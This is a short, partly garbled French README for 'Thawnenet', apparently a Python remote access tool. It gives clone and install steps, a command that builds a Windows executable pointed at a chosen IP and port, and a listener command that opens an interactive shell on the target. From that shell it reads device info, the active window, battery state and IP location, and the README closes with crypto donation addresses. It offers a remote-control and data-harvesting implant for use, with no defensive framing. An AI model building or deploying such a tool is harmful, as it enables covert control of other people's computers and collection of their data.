Thawnenet est un outil conçu pour donner le contrôle du système Windows à distance et en récupérer des informations. Thawnenet est une application client / serveur développée dans Python Windows pour le côté client et le serveur est également en Python.

Thawnenet a besoin de python3
git clone https://github.com/cisamu123/ThawneNet.git
cd ThawneNET
pip install -r requirements.txt
```.
### Available Modes
* `--build` - for building the exe
* `--shell` - getting an interactive shell of the device
buildUtilisation: Python3 Server.py --Build
shellUtilisation: Python3 Server.py --shell [Flags] Flags: -I, --ip listner IP Address -p, --port listner Port Number
Après avoir exécuté le mode shell , vous obtiendrez un interprète de l'appareil
Commandes qui peuvent fonctionner sur l'interprète
info --> returns basic info of the device
activeWindow --> returns active window
battery --> returns battery info
whois --> returns the ip, city, country etc of the device
clear --> clears the screen
exit --> exit the interpreter
Pour construire l'EXE en utilisant IP et port souhaités: python3 server.py --build
Pour obtenir l'interprète: python3 server.py --shell -i 0.0.0.0 -p 8000

BTC: bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y
ETH: 0x8d797249170d263B959A3c688D8456adBcfBC319
XMRT: 0xF978FE35d00A201eB48aB3908993e14f312001a2
Thawnenet est autorisé sous licence MIT, jetez un coup d'œil à la licence pour plus d'informations.